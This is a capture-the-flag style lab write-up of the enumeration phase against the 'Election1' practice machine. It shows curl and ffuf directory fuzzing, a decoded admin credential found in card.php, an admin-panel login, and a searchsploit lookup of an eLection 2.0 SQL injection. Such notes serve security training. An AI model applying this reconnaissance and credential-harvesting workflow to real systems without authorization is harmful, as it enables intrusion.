Web
Nmap discovered a Web service on the port 80 of the 192.168.209.211 host.
The running service is Apache httpd 2.4.29 ((Ubuntu))
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ curl -I -X OPTIONS http://$IP/
HTTP/1.1 200 OK
Date: Tue, 01 Jul 2025 18:09:07 GMT
Server: Apache/2.4.29 (Ubuntu)
Allow: POST,OPTIONS,HEAD,GET
Content-Length: 0
Content-Type: text/html
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ curl -I http://$IP/
HTTP/1.1 200 OK
Date: Tue, 01 Jul 2025 18:09:09 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Sun, 20 Oct 2019 15:04:12 GMT
ETag: "2aa6-59558e1434548"
Accept-Ranges: bytes
Content-Length: 10918
Vary: Accept-Encoding
Content-Type: text/html/Play/Election1/2-Enumeration/attachments/{9551462E-967F-487D-AAB3-A0D0E734ADAF}-1.png)
Webroot
It’s the default Apache installation page.
Fuzzing
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://$IP/FUZZ -ic -e .html,.txt,.php
________________________________________________
:: Method : GET
:: URL : http://192.168.209.211/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
:: Extensions : .html .txt .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.htaccess [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 19ms]
.htaccess.html [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 19ms]
.htaccess.txt [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 20ms]
.htaccess.php [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 19ms]
.htpasswd [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 19ms]
.htpasswd.html [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 19ms]
.htpasswd.php [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 20ms]
.htpasswd.txt [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 22ms]
election [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 21ms]
index.html [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 21ms]
javascript [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 21ms]
phpinfo.php [Status: 200, Size: 95498, Words: 4715, Lines: 1170, Duration: 27ms]
phpmyadmin [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 20ms]
robots.txt [Status: 200, Size: 30, Words: 1, Lines: 5, Duration: 19ms]
robots.txt [Status: 200, Size: 30, Words: 1, Lines: 5, Duration: 21ms]
server-status [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 20ms]
:: Progress: [81912/81912] :: Job [1/1] :: 1587 req/sec :: Duration: [0:00:55] :: Errors: 0 ::
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://$IP/FUZZ/ -ic
________________________________________________
:: Method : GET
:: URL : http://192.168.209.211/FUZZ/
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
[Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 21ms]
icons [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 23ms]
javascript [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 20ms]
election [Status: 200, Size: 7003, Words: 1676, Lines: 173, Duration: 266ms]
phpmyadmin [Status: 200, Size: 10531, Words: 504, Lines: 26, Duration: 408ms]
server-status [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 19ms]
:: Progress: [207630/207630] :: Job [1/1] :: 1923 req/sec :: Duration: [0:02:02] :: Errors: 0 ::/election//phpinfo.php/phpmyadmin//robots.txt
/robots.txt
/Play/Election1/2-Enumeration/attachments/{F7C23A9C-7315-4B2F-BB31-DD4B618F401C}.png)
Only /election/ endpoint is valid.
/phpmyadmin/
/Play/Election1/2-Enumeration/attachments/{FE351147-D6FE-45E2-968A-A99C4D48C3A6}.png)
phpMyAdmin instance at the /phpmyadmin/ endpoint.
No credential is known at this time.
/phpinfo.php
/Play/Election1/2-Enumeration/attachments/{05191401-7CD1-4282-8412-7DB0AD9231BB}.png)
DOCUMENT_ROOT is set to /var/www/html
/election/ Endpoint
/Play/Election1/2-Enumeration/attachments/{2DCA867A-04FA-4034-8E07-6A3193128200}.png)
eLection instance by Tripath Project.
/Play/Election1/2-Enumeration/attachments/{9B0D363E-8F1F-4306-9410-61D592640709}.png)
Source code is available for review.
The latest version is 2.0 and was released over 7 years ago.
/Play/Election1/2-Enumeration/attachments/{6D694243-86DA-4C68-9444-DA81BCD17222}.png)
Checking the Candidates section reveals a single user
It appears to be fetched from a database, strongly suggesting a potential SQL injection vulnerability.
Fuzzing /election/ Endpoint
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://$IP/election/FUZZ -ic -e .html,.txt,.php
________________________________________________
:: Method : GET
:: URL : http://192.168.209.211/election/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
:: Extensions : .html .txt .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
admin [Status: 301, Size: 327, Words: 20, Lines: 10, Duration: 25ms]
card.php [Status: 200, Size: 1935, Words: 215, Lines: 2, Duration: 22ms]
data [Status: 301, Size: 326, Words: 20, Lines: 10, Duration: 21ms]
index.php [Status: 200, Size: 7003, Words: 1676, Lines: 173, Duration: 27ms]
js [Status: 301, Size: 324, Words: 20, Lines: 10, Duration: 22ms]
languages [Status: 301, Size: 331, Words: 20, Lines: 10, Duration: 21ms]
lib [Status: 301, Size: 325, Words: 20, Lines: 10, Duration: 21ms]
media [Status: 301, Size: 327, Words: 20, Lines: 10, Duration: 20ms]
themes [Status: 301, Size: 328, Words: 20, Lines: 10, Duration: 19ms]
:: Progress: [81912/81912] :: Job [1/1] :: 1980 req/sec :: Duration: [0:00:48] :: Errors: 0 ::/admin//card.php
/card.php Endpoint
/Play/Election1/2-Enumeration/attachments/{ECA82D26-4769-4FA3-8C3E-EB622E3996FA}.png)
The /election/card.php endpoint hosts a binary blob
Decoding
/Play/Election1/2-Enumeration/attachments/{ECEF75DA-F578-43D6-94FA-B1FD81B036A6}.png)
It was encoded twice with binary format.
The decode result is a credential; 1234:Zxc123!@#
Admin Panel
/Play/Election1/2-Enumeration/attachments/{44EFA868-3F73-4CD7-8D88-CD3CC83639F1}.png)
Admin panel is available at the /admin/ endpoint.
The default credential is 1234:1234
But a valid credential is already found above; 1234:Zxc123!@#
/Play/Election1/2-Enumeration/attachments/{C1D0A70C-A6A8-4A74-81F2-1872D725104D}.png)
/Play/Election1/2-Enumeration/attachments/{E257A772-F615-4998-8E6B-4842AE8A49B2}.png)
/Play/Election1/2-Enumeration/attachments/{B1F86CBC-6452-4B10-8CBB-853E4195EB2B}.png)
Successfully authenticated.
Version Information
/Play/Election1/2-Enumeration/attachments/{325D1397-A00D-4546-B631-7293C8AE03CF}.png)
Version information is disclosed at the Settings menu; 2.0
Vulnerabilities
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1/source_code]
└─$ searchsploit eLection 2.0
------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------ ---------------------------------
eLection 2.0 - 'id' SQL Injection | php/webapps/48122.txt
------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No ResultseLection 2.0 suffers from an authenticated SQL injection; CVE-2020-9340